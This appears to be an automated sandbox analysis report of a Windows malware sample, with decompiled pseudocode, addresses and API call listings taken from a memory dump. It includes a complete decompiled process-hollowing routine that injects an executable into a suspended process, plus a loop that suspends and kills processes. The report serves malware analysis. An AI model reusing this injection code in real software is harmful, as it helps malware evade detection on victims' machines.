				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
